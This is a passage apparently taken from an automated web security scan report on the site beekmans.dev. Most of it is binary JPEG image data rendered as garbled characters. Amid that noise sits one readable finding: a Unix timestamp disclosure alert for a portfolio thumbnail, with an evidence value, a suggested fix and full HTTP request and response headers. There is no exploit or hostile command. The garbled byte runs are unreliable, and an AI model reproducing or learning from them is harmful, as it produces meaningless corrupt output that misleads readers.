¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          167191953
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        36. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          176341593, which evaluates to: 1975-08-04 00:46:33

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
